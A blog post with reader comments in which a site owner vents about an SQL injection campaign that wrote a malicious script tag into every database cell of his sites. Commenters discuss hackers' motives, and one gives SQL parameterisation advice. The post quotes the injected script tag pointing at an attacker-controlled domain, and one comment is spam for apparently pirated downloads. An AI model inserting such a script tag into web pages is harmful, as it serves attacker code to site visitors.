Many of you have properly tried it, not hacking but getting your websites hacked. And about this hacking there are somethings I really don’t understand.
What is it they get out of it, seriously what is it about hacking that is so funny I really can’t figure it out.! ![]()
The only thing I can say is that it pisses me off when one of my sites get hacked, and they of course sometimes do and they did last week. Where a new hack found a hole in the MSSQL servers, and it updated every single cell with this crap.
"script type="text/javascript" src="http://lilupophilupop.com/sl.php">
And at this time there is about 1.650.000 webpages where this text is on due to they hacked the website.

If your site was hacked check your log for these numbers “736574″, then you should be able to see where they got in.
But back to story…!
Again it pisses me off if they hack one of my sites, but I can easily find the hole and plug it. But then one thing that really gets me off is that they also target small pages, personal pages, pages made for kids and their football team and so on, what the hell have they done to deserve it.
Really what has small kids done to deserve, to get the football teams website hacked. And it’s here where I want to find the little sob and do something bad, I have been working since last week to restore a couple of pages for nonprofit organizations and help pages.
Here you have ppl trying to help others for free, and they get their websites hacked why.??
So do you have any idea on why they think it’s so freaking funny and why to they target small pages, and of course have you ever been hacked.?
I could understand if it was a page, saying it’s okay to spank/hits children or something along those lines……

Don’t you think a bunch of them are trying to make money – they try to get links to sites they make money on. Sometimes they get control of the computer to send junk email. But some of them are just vandals that enjoy destroying things others spent time creating.

That might be the reason, but those links doesn’t have much value because it’s from small links.
Yeah, a agree with you, but i think the number of those who destroying the other’s works just for entertaining is not less than those who do it for their own benefit. my facebook page once was hacked, that #$%^ hacker flooded my friends’ page with tons of crappy links, how annoying,i just wanted to kick his ass at that moment.
Almost the same thing happened to me. Somehow the “hacker” got ahold of my FTP login details (I probably had a virus on my computer) and updated every index* and *.js file with some nasty JavaScript, effectively breaking the whole site. Since it essentially was a modified Simple Machine Forum with hundreds of files it took many hours to get rid of.
I don’t think the hackers target anyone but are all using bots to go through every single page on the internet looking for holes to exploit. I’m pretty sure it’s all automatical anyway.

Well , it seems to me that hackers do it just for show off or to harm their enemies . another reason may be to get backlinks by injecting their links in victims script .
Amandeep Singh Nagpal recently posted..“Let It Snow” – Another Mesmerizing Easter Egg !
We had an ingenious hacker take over our site. He got in via FTP, uploaded a bunch of files that called a PHP script encoded in Base 64.
He was trying to get our passwords. What we did was just take the site down, and switch to Magento. There is an Authorize.net extension that keeps all of the passwords and payment info on their server, and just sends us a customer ID. That way, if a hacker tries again, he will only get some numbers, nothing relevant.
They do it to promote the name of their “group” and gain credit in their online social group. They dont target a kids website or a companies site, they run scrapes across the web and attack the site that the scrape exposes as having the exploit – they probably never even look at the sites they hack so dont know who the victims are.

From psychological point of view, it is likely that they do this to show others that how smart or “gifted” they are in what they are doing. Well…, it is very hard for the general public like us to understand I guess.

You are absolutely right on, that the general public doesn’t care or at least I don’t.
But if they want to show how good they are, they should target the ones that could benefit from their “gift”.
But as Gast writes it properly “just” bots doing all the work, so the only thing we can do if close the hole when they find them and make backups daily…..

I’m not sure why people would rather ruin the work of others than accomplishing something by themselves. I guess they feel frustrated by other’s success and their own failures.

Hi Jimmy! I love this post. I also feel sad and frustrated why these hackers mess with people’s websites, especially those sites that are built for noble causes. These hackers just love to make other people’s lives miserable and that probably is fun for them. Such a pity. Websites should be more careful and improve their security features to prevent these crawling disasters from getting in.
It’s a good thing you were able to track the error early on.
I think hackers use hacked sites to hide there dirty deeds. Hacker may journey through multiple sites to hide a trail when the intended target was someone else all together. If a white hat hacker tries to retrace the trail of an denial of service attack it looks like it came from your site. Its a shame the black hat hackers cause so much damage to someones hard work for the fun or the experience.

Great post, very informative and really enjoyed reading it! wow – lots of comments too!
Hackers are in every game, if you think about it, it will never really get abolished. Just tell them you’re playing normally if you’re accused and report the hacker that is actually hacking. I can’t believe that people actually find hacking in games fun.
It is not just big companies that get hit, many hackers just like causing people bother as it makes them feel like they have achieved something. Maybe they should turn their skills to something more constructive!
Twitter: w3blogdk
says:
You are on to something, It would be great if they used their skills for something good. The big question is just, how do we get them to do just that.
Because after I’ve written this post I got an email from a hacker, where he told me the reason he does it.
Which took me by surprise because for him it’s a way for him to build up his skills, the get a better job and salary for his work in website security when his done with his education.
And if he didn’t do it and thereby getting experience in this field, he would have trouble finding a good job and he hates the fact that he has to do it bur for him there is no other way.
But and that a big but, he is only one out of god knows how many hackers, where many do it for fun or like many of the others has written just to piss us of.
Hackers are just like everyone else, it’s just that their particular talent is often detrimental to the rest of us.
We all want to find our talents and skills in life and use them as much as we can to the best of our ability. Whether it be to make money, become famous or quite simply to perform an activity and see it produce some physical results we all have different motivations but we all want to be doing something.
In most industries where people put in hard work, very few people stop to take into consideration what damage their ‘hard work’ could be doing to other people, why should hackers be any different?

Great discussion! I can answer this myself because I have a friend before who is very good in computer and can do hacking on websites. He told me he did that because he was dissapointed of the website, by the way it was an online game website. But maybe some other hackers are making money of it. You guys can check a good website that is offering free download of pc games, latest movies, and complete anime episodes.

Hey Jimmy, this really annoys me too. It is mostly kids on a power trip doing it because they can. The internet is great but it has its downfalls. People who hack sites feel like there is no consequence to what they do. They don’t see their victims as real people, just digital targets for their own entertainment. I am glad my site has never been hacked, and I hope it stays that way. I’m sorry to hear this happened to you.

To stop this one from getting in and others, you have to secure your sql statements.
This means that you shouldn’t use anything from the querystring directly into your sql statements, the same goes for textboxes always use parameters or stored procedures.
Use validation on all textboxes, so the users/or hackers only can post text in them.
This will go a long way!
Maybe they’d like to practice for their skills. o.o

Unfortunately, that’s one of the perils of doing business online. You can get angry, furious, laugh it off, or wonder why they do it. But it doesn’t help to stay un-hacked. If you had the skills to hack a website what would you do? You now possess the power to do something that most people don’t have and you’d put it to good use( good as far as you are concerned.) Power is a strong incentive isn’t it.

I think to do something like that there have some reason behind this. May be they want to get more money, or to get famous and all that. Because it is sure that to hike someone others link it is not a easy task at all. Those people are doing this they might be intelligent and may be they want to highlight their name threw to this.
Funny to them to hacked website maybe they are enjoy hacking anybody’s website. What we have to do is we have to protect for all our website so that no hackers can hacked it. They are such an looser.
